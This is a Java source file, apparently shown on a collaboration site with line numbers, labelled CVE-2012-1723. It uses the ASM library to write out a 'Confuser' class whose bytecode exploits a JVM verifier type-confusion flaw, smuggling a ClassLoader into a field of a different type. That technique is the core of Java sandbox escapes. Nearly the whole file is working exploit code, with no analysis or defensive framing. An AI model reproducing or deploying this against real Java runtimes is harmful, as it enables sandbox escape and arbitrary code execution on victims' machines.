Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package cve1723;
2

3
import org.objectweb.asm.*;
4

5
import java.io.ByteArrayOutputStream;
6
import java.io.FileOutputStream;
7
import java.io.IOException;
8
import java.io.InputStream;
9
import java.nio.*;
10
import java.util.Arrays;
11

12
import static org.objectweb.asm.Opcodes.*;
13

14
/**
15
 * CVE-2012-1723
16
 */
17
public class Generator {
18
	public static byte[] generateConfusion() {
19
		final String STATIC_FIELD_NAME = "staticTypeA";
20
		final String INSTANCE_FIELD_NAME = "instanceTypeB";
21
		final String CONFUSE_METHOD_NAME = "confuse";
22
		final String CONFUSER_CLASS_NAME = "cve1723/Confuser";
23

24
		final String TYPE_A = "Ljava/lang/ClassLoader;";
25
		final String TYPE_B = "Lcve1723/ConfusingClassLoader;";
26

27
		final ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES | ClassWriter.COMPUTE_MAXS);
28

29
		MethodVisitor mv = null;
30
		FieldVisitor fv = null;
31

32
		cw.visit(V1_5, ACC_PUBLIC | ACC_SUPER, CONFUSER_CLASS_NAME, null, "java/lang/Object", null);
33

34
		// static field of type A (ClassLoader)
35
		{
36
			fv = cw.visitField(ACC_STATIC, STATIC_FIELD_NAME, TYPE_A, null, null);
37
			fv.visitEnd();
38
		}
39

40
		// one hundred fields of type B (ConfusingClassLoader)
41
		{
42
			for (int i = 0; i < 100; i++) {
43
				fv = cw.visitField(ACC_PUBLIC, INSTANCE_FIELD_NAME + i, TYPE_B, null, null);
44
				fv.visitEnd();
45
			}
46
		}
47

48
		// constructor
49
		{
50
			mv = cw.visitMethod(ACC_PUBLIC, "<init>", "()V", null, null);
51
			mv.visitCode();
52
			mv.visitVarInsn(ALOAD, 0);
53
			mv.visitMethodInsn(INVOKESPECIAL, "java/lang/Object", "<init>", "()V");
54
			mv.visitInsn(RETURN);
55
			mv.visitMaxs(0, 0);
56
			mv.visitEnd();
57
		}
58

59
		// confuse method
60
		{
61
			mv = cw.visitMethod(ACC_PUBLIC, CONFUSE_METHOD_NAME, "(" + TYPE_A + ")" + TYPE_B, null, null);
62
			mv.visitCode();
63
			/*
64
				aload 1		 // push parameter onto stack
65
				ifnonnull cont:
66
				aconst_null
67
				areturn		  // quick return
68
			cont:
69
				getstatic STATIC_FIELD_NAME
70
				pop
71
				aload 0
72
				aload 1
73
				putfield STATIC_FIELD_NAME // force this into a non-static field
74

75
				// find instance field that's not null
76
				aload 0
77
				getfield INSTANCE_FIELD_NAME_1
78
				ifnull cont2:
79
				aload 0
80
				getfield INSTANCE_FIELD_NAME_1
81
				areturn
82
			cont2:
83
				...
84

85
				aconst_null
86
				areturn
87
			 */
88

89
			// first part
90
			mv.visitVarInsn(ALOAD, 1);
91
			final Label cont = new Label();
92
			mv.visitJumpInsn(IFNONNULL, cont);
93
			mv.visitInsn(ACONST_NULL);
94
			mv.visitInsn(ARETURN);
95
			mv.visitLabel(cont);
96

97
			// 2nd part
98
			mv.visitFieldInsn(GETSTATIC, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
99
			mv.visitInsn(POP);
100
			mv.visitVarInsn(ALOAD, 0);
101
			mv.visitVarInsn(ALOAD, 1);
102
			mv.visitFieldInsn(PUTFIELD, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
103

104
			for (int i = 0; i < 100; i++) {
105
				mv.visitVarInsn(ALOAD, 0);
106
				mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
107
				final Label contN = new Label();
108
				mv.visitJumpInsn(IFNULL, contN);
109
				mv.visitVarInsn(ALOAD, 0);
110
				mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
111
				mv.visitInsn(ARETURN);
112
				mv.visitLabel(contN);
113
			}
114

115
			mv.visitInsn(ACONST_NULL);
116
			mv.visitInsn(ARETURN);
117

118
			mv.visitMaxs(0, 0);
119
			mv.visitEnd();
120
		}
121
		cw.visitEnd();
122

123
		return cw.toByteArray();
124
	}
125

126
	public static void main(final String args[]) throws Exception {
127
		final byte data[] = Generator.generateConfusion();
128
		final FileOutputStream fo = new FileOutputStream("Confuser.class");
129
		fo.write(data);
130
		fo.close();
131
	}
132
}
133

134